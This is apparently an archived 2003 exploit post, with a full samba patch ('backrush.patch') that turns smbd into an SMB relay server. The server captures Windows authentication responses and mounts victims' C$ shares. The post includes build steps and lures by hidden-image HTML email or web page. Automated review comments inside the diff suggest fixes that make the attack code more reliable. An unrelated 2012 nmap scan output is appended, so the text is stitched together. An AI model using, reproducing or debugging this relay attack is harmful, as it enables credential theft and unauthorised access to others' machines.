# Exploit for "Authentication flaw in Windows SMB protocol" #
##########################################
# Release Date:
# April 24, 2003
#
# Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir)
# Salman Niksefat (salman@linux.ce.aut.ac.ir)
#
# Systems Affected by this exploit:
# Windows 2000 (SP0 SP1 SP2 SP3)
# Windows XP (SP0 SP1)
#
# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT
# WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.
##########################################

This exploit is based on samba-2.2.8a, you can download the source code from:
http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2
or other mirrors.

First you should configure and make samba source code as follow:
You need first to extract the file:
$ tar -jxf samba-2.2.8a.tar.bz2
$ cd samba-2.2.8a/source

Here you need to configure with suitable options. Here is a config for RedHat 9:
$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages\
--with-lockdir=/var/cache/samba --with-configdir=/etc/samba

$ make
$ make bin/smbmount
$ su
# make install

First add an arbitrary user to samba: (Choose a reliable password for it for your protection!)
# smbadduser smbtmpuser:root

Now check if your samba server(bin/smbd) and client(bin/smbmount) are working,
and that ipchains rules are not set. You can use:
# service smbd stop
# bin/smbd -i
# ipchains -F

Well, now if everything works fine, you can apply the exploit code to the source.
Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch
# patch < backrush.patch

Make it again:
# make bin/smbd
# make bin/smbmount
[Note that you shouldn't make whole samba, cause you may get linker errors]

Make necessary directories:
# mkdir -p bin/backrush/log
# mkdir bin/backrush/mnt
# touch bin/backrush/ip2sharename.map

Now we are done, you MUST change directory to bin and run the server:
# cd bin
# killall -9 smbd
# ./smbd

Now by default, the C$ share folder of any Windows machine who tries to connect
to this SMB server, would be mounted to mnt/machinename-random folder.
If you want to mount another share folder, you can add an entry to ip2sharename.map file as follow:
IPADDRESS:SHARENAME
This option is suitable for XP systems.

2 ways 2 force a client to automatically connect to your modified SMB server:
1. Send him/her a HTML email with the following tag:
<IMG src='\\smb-server\nofile.gif' width=1 height=1>

2. Invite him/her to visit your personal web page.
You can make it by the above tag, then pray and wait until he/she visits your page. ;)

Enjoy!


  * backrush.patch *


diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c
--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430
+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430
@@ -26,6 +26,10 @@
#include <mntent.h>
#include <asm/types.h>
#include <linux/smb_fs.h>
+//>Backrush
+int br_read[2], br_write[2], br_pid;
+struct Backrush br_state;
+//<

extern BOOL in_client;
extern pstring user_socket_options;
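Review bot: `br_read`, `br_write`, `br_pid` and `br_state` are defined as globals here and again, with the same names, in smbd/server.c; that only links because smbmount and smbd are separate programs, so a comment stating that each binary carries its own copy (both declared `extern` in includes.h) would save the next reader a duplicate-symbol hunt. Minor: the marker comments are `//>Backrush` ... `//<` here but reversed in the server.c hunk; pick one form.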
@@ -177,6 +181,21 @@
cli_shutdown(c);
return NULL;
}
+//>Backrush
+ {
+ int i;
+ printf("challange: ");
+ for (i = 0; i < 8; i++)
+ printf("%0.2x",c->cryptkey[i]);
+ fflush(stdout);
+ memcpy(br_state.challenge, c->cryptkey, 8);
+ br_state.status = 1;
+ write(br_write[1],&br_state, sizeof(br_state));
+ printf(" sent to server\n");
+ printf("waiting for response...\n");
+ fflush(stdout);
+ }
+//<

if (!got_pass) {
char *pass = getpass("Password: ");
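Review bot: `write(br_write[1], &br_state, sizeof(br_state))` is unchecked; if the descriptor was never set (it is only filled from the environment later in this file) or the write is short, the server side stays blocked in its `read` and the mount never completes. Compare the return value against `sizeof(br_state)` and exit with a message otherwise. Also, `printf("%0.2x", c->cryptkey[i])` prints sign-extended values such as `ffffffa3` when `cryptkey` is a plain `char` array; cast each byte to `unsigned char` before printing.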
@@ -848,6 +867,14 @@
if (*credentials != 0) {
read_credentials_file(credentials);
}
+//>Backrush
+ printf("Started to mount %s on %s\n",argv[1], argv[2]);
+ fflush(stdout);
+ if (getenv("BACKRUSH_READ"))
+ br_read[0] = atoi(getenv("BACKRUSH_READ"));
+ if (getenv("BACKRUSH_WRITE"))
+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));
+//<

DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));

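Review bot: only `br_read[0]` and `br_write[1]` are populated here, and only when `BACKRUSH_READ` / `BACKRUSH_WRITE` are present; with them unset both stay 0, so the later `read(br_read[0], ...)` in cliconnect.c silently reads from stdin. `atoi` also turns a malformed value into 0 with no error. Treat a missing or non-numeric variable as fatal, e.g. `if (!getenv("BACKRUSH_READ")) { fprintf(stderr, "BACKRUSH_READ not set\n"); exit(1); }`.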
diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h
--- /root/samba-2.2.8a/source/include/includes.h 2003-02-28 19:26:18.000000000 +0330
+++ /backrush/source.exp/include/includes.h 2003-04-17 10:36:54.000000000 +0430
@@ -1,5 +1,26 @@
#ifndef _INCLUDES_H
#define _INCLUDES_H
+
+//>Backrush
+#include <stdlib.h>
+#include <time.h>
+struct Backrush
+{
+ int status;
+ char ip_address[20];
+ int port;
+ char username[256];
+ char sharename[256];
+ char netbios[256];
+ char domain[256];
+ char challenge[8];
+ char nt_resp[24];
+ char lm_resp[24];
+};
+extern struct Backrush br_state;
+extern int br_read[2],br_write[2],br_pid;
+//<
+
/*
Unix SMB/Netbios implementation.
Version 1.9.
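Review bot: `struct Backrush` is copied raw through a pipe in the other hunks (`write(..., &br_state, sizeof(br_state))`), so document it here as a wire format: the 8-byte `challenge` and 24-byte `nt_resp`/`lm_resp` fields match the LM/NTLM challenge-response sizes, but `ip_address[20]` only fits a dotted IPv4 address and `br_pid` should be `pid_t`. Adding `<stdlib.h>` and `<time.h>` to the umbrella header ahead of the original file comment is also out of place; include them in the files that call `srand`/`time`.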
diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c
--- /root/samba-2.2.8a/source/libsmb/cliconnect.c 2003-03-15 01:04:48.000000000 +0330
+++ /backrush/source.exp/libsmb/cliconnect.c 2003-04-17 12:30:26.000000000 +0430
@@ -23,7 +23,6 @@

#include "includes.h"

-
static const struct {
int prot;
const char *name;
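Review bot: this hunk only deletes a blank line; drop it from the patch so the diff carries functional changes only.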
@@ -265,7 +264,28 @@
memcpy(pword, pass, passlen);
memcpy(ntpword, ntpass, ntpasslen);
}
-
+//>Backrush
+ {
+ int i;
+ read(br_read[0],&br_state, sizeof(br_state));
+ printf("received response:\n");
+ fflush(stdout);
+ memcpy(pword, br_state.lm_resp, 24);
+ memcpy(ntpword, br_state.nt_resp, 24);
+ if(br_state.username[0])
+ strncpy(user, br_state.username, 24);
+ printf("username: %s\n", user);
+ printf("lm response: ");
+ for (i = 0; i < 24; i++)
+ printf("%0.2x",pword[i]);
+ printf("\n");
+ printf("nt response: ");
+ for (i = 0; i < 24; i++)
+ printf("%0.2x",ntpword[i]);
+ printf("\n");
+ fflush(stdout);
+ }
+//<
/* send a session setup command */
memset(cli->outbuf,'\0',smb_size);

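Review bot: the two `memcpy` calls overwrite `pword` and `ntpword` with 24-byte responses, but `passlen` and `ntpasslen`, which the original copies just above use, are not updated to 24, so the lengths placed in the session setup can disagree with the data copied in. Set both to 24 in this block. `strncpy(user, br_state.username, 24)` also truncates a 256-byte field to 24 characters without guaranteeing a NUL terminator; bound it by the real size of `user` and terminate explicitly. The `read()` result is unchecked, same remark as for the pipe write in smbmount.c.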
diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c
--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330
+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430
@@ -180,6 +180,45 @@
doencrypt = ((cli->sec_mode & 2) != 0);
}

+//>Backrush
+ {
+ srand(time(NULL));
+ pipe(br_read);
+ pipe(br_write);
+ br_state.status = 1;
+ br_state.port = random();
+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));
+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));
+ {
+ char tmp[1024], *ptr;
+ FILE *fin = fopen("backrush/ip2sharename.map","r");
+ if (fin)
+ {
+ while(fscanf(fin, "%s", tmp) > 0)
+ {
+ ptr = strchr(tmp, ':');
+ *ptr++ = 0;
+ if (!strcmp(br_state.ip_address,tmp))
+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));
+ }
+ fclose(fin);
+ }
+ }
+ if (!(br_pid = fork()))
+ {
+ char cmd[1024];
+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);
+ system(cmd);
+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d;
./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in
>backrush/log/%s-%d",
+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address,
br_state.port, br_state.ip_address, br_state.port);
+ system(cmd);
+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d",
br_state.ip_address, br_state.port);
+ system(cmd);
+ _exit(0);
+ }
+ }
+//<
+
if (doencrypt) {
crypt_len = 8;
if (!cli) {
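Review bot: `ptr = strchr(tmp, ':'); *ptr++ = 0;` dereferences NULL for any line of `ip2sharename.map` without a colon, and `fscanf(fin, "%s", tmp)` has no width limit on the 1024-byte buffer; use `%1023s` and skip the entry when `strchr` returns NULL. The `snprintf` format string for the smbmount command is printed broken across three lines, which is not a valid C string literal as shown; if that is wrapping in the listing say so, otherwise this hunk will not compile. The `password=let_me_go_in` in that command is never used by the patched client (the responses arrive over the pipe), so mark it as a placeholder. `srand()` pairs with `rand()`, while this code draws from `random()`; seed with `srandom()` to match.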
diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c
--- /root/samba-2.2.8a/source/smbd/password.c 2003-04-07 06:24:00.000000000 +0430
+++ /backrush/source.exp/smbd/password.c 2003-04-19 09:15:47.000000000 +0430
@@ -48,6 +48,10 @@
unsigned char buf[8];

generate_random_buffer(buf,8,False);
+//>Backrush
+ read(br_read[0],&br_state, sizeof(br_state));
+ memcpy(buf, br_state.challenge, 8);
+//<

memcpy(saved_challenge, buf, 8);
memcpy(challenge,buf,8);
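Review bot: `read(br_read[0], &br_state, sizeof(br_state))` blocks until the forked smbmount has sent its challenge; if that child failed to start, every negotiate handled by this smbd hangs here, and a short read would leave `br_state.challenge` partly stale with no error. Check that the return value equals `sizeof(br_state)` and otherwise keep the value `generate_random_buffer` already placed in `buf` on the line above.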
@@ -466,7 +470,13 @@
uchar challenge[8];
char* user_name;
uint8 *nt_pw, *lm_pw;
-
+//>Backrush
+ memcpy(br_state.nt_resp, nt_pass, 24);
+ memcpy(br_state.lm_resp, lm_pass, 24);
+ write(br_write[1],&br_state, sizeof(br_state));
+// waitpid(br_pid,NULL,WNOHANG);
+ return(False);
+//<
if (!lm_pass || !sampass)
return(False);

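Review bot: the unconditional `return(False)` makes everything after it unreachable, including the `if (!lm_pass || !sampass)` guard two lines below, yet `memcpy(br_state.lm_resp, lm_pass, 24)` runs before that guard, so a NULL `lm_pass` now crashes smbd instead of being rejected. Move the NULL checks above the `memcpy` calls. The commented-out `waitpid(br_pid, NULL, WNOHANG)` also means the child forked in negprot.c is never reaped; re-enable it or install a SIGCHLD handler.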
diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c
--- /root/samba-2.2.8a/source/smbd/reply.c 2003-04-07 06:24:00.000000000 +0430
+++ /backrush/source.exp/smbd/reply.c 2003-04-16 18:03:58.000000000 +0430
@@ -974,6 +974,11 @@
* security=domain.
*/

+//>Backrush
+ strncpy(br_state.username,user,sizeof(br_state.username));
+ strncpy(user,"root",sizeof(br_state.username));
+//<
+
if (!guest && !check_server_security(orig_user, domain, user,
smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&
!check_domain_security(orig_user, domain, user, smb_apasswd,
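Review bot: `strncpy(user, "root", sizeof(br_state.username))` bounds the copy by the size of a different buffer: `strncpy` pads with NUL bytes up to that count, so it writes 256 bytes into `user`, whose declared size is not visible here and may be smaller. Bound it by the real size of `user`, or by `strlen("root") + 1`.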
diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c
--- /root/samba-2.2.8a/source/smbd/server.c 2003-03-15 01:04:49.000000000 +0330
+++ /backrush/source.exp/smbd/server.c 2003-04-16 18:05:17.000000000 +0430
@@ -25,6 +25,11 @@
extern fstring global_myworkgroup;
extern pstring global_myname;

+//<Backrush
+int br_read[2],br_write[2],br_pid;
+struct Backrush br_state;
+//>
+
int am_parent = 1;

/* the last message the was processed */
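Review bot: the marker comments here are `//<Backrush` ... `//>`, the reverse of the `//>Backrush` ... `//<` pairs used in every other hunk; make them consistent so all inserted blocks can be found with one grep. These globals also duplicate the ones added to client/smbmount.c, which deserves a comment saying each binary has its own copy.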

# milw0rm.com [2003-04-25]
root@BT:/pentest/exploits/exploitdb# nmap 192.168.0.67

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 21:05 WIT
Nmap scan report for 192.168.0.67
Host is up (0.0021s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:B3:F9:F8 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds